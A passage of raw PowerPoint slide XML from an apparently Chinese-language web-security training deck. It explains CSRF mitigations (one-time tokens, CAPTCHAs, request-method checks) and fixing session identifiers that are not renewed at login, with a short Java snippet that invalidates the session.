              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>使用一次性令牌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   每个请求都带上一个由服务器生成的随机参数。然后在服务器端核对该参数，如果和下发的随机数不同，则可以认为有人在伪造请求。因为攻击者无法知道他本次攻击的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>请求需要带什么样的随机数才是有效的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>使用验证图片</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   图片验证信息很难被恶意程序在客户端识别，因此能够提高更强的保护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>请求类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>判断请求的方式是否</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>直接获取数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>再次封装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>直接获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的数据不接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的 ，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(“user”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="142875"/>
            <a:ext cx="8543925" cy="706438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：规避方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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428625" y="1143000"/>
            <a:ext cx="8572500" cy="4678363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>过期时间未设置，可能会引发一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>欺骗攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>风险</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>可能会窃取或操纵客户会话和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，它们可能用于模仿合法用户，从而使黑客能够以该用户身份查看或变更用户记录以及执行事务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>解决方案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>始终生成新的会话，供用户成功认证时登录。在登录页面上加上一段代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>在登陆页面上加的这段代码的作用就是，将用户进入登陆页面时所产生的会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> session)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 清空，然后让跟踪这个会话的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>过期，这样服务器就不再掌握有关这个会话的任何信息了。要想与服务器继续通信，就要产生一个新的会话才行。于是会话标示就更新了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100012" y="75929"/>
            <a:ext cx="9043988" cy="706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>会话标识未更新</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="表格 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="571500" y="3500438"/>
          <a:ext cx="7643813" cy="1066800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7643813"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>request.getSession</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>().invalidate();//</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>清空</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>session</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>if (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>request.getCookies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>()!=null) {</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>   Cookie </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>request.getCookies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>()[0];// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>获取</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cookie</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cookie.setMaxAge</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(0);// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>让</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>过期 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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如果在应用需求确立与设计之初就开始做安全成本更低</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>金融技术中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
